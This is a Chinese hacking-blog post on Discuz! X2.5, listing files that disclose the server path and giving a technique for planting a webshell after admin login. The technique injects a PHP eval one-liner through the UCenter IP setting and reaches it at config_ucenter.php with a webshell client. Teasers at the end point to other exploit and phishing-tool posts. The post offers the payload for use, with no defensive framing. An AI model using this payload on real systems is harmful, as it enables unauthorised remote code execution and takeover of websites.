discuz! x2.5爆路径漏洞及后台拿shell

hacker4年前 (2020-05-31)黑客文章1766

爆路径文件如下:

/uc_server/control/admin/db.php
/source/plugin/myrepeats/table/table_myrepeats.php
/install/include/install_lang.php

后台拿shell

需要有管理员帐号及密码，进入后台打开站长—-ucenter设置，直接在UCenter IP 地址:里面插入一句话

xxoo\\’);eval($_POST[a])?>;//

就ok ，然后菜刀连接 http://chnctocom/config/config_ucenter.php 密码a

标签: 黑客技术

返回列表

国外黑客发现Linux 内核2.6.37-3.8.9版本一个漏洞，成功利用该漏洞可能获得特权用户，还算新鲜，转来给大家看看。比较好用的~ http://fucksheep.org/...

什么叫Keepass？ Keepass是互联网技术中能用的密码管理器之一。它能够储存很多能够根据一个主密码解锁的登陆密码。这仅仅记牢一个高品质的登陆密码，而且依然能够为不一样的账号应用唯一的登陆密码...

科汛网站程序任意用户上传漏洞利用, 主要也要用到iis6.0的解析漏洞,如果服务器是其他版本的IIS则无效。搜索关键字： Powered By KesionCMS V5.5 inur...

什么叫Kismet？ Kismet是802.11无线网络的排序嗅探器，互联网探测器和入侵防御系统系统软件。该专用工具将与适用初始监控器方式的别的无线卡一起应用，而且还能够网络嗅探802.11a，80...

很久没有人用HackBar软件了，今日用火狐浏览器登录上来，按F12键调成HackBar，发觉竟然做以下提醒： Please enter your license to use hackbar. G...

HiddenEye是一款具备高級作用的当代互联网钓鱼工具，而且还适用Android系统软件。 HiddenEye必须大家的电脑上自然环境考虑下列规定： Python 3 Python...

找黑客平台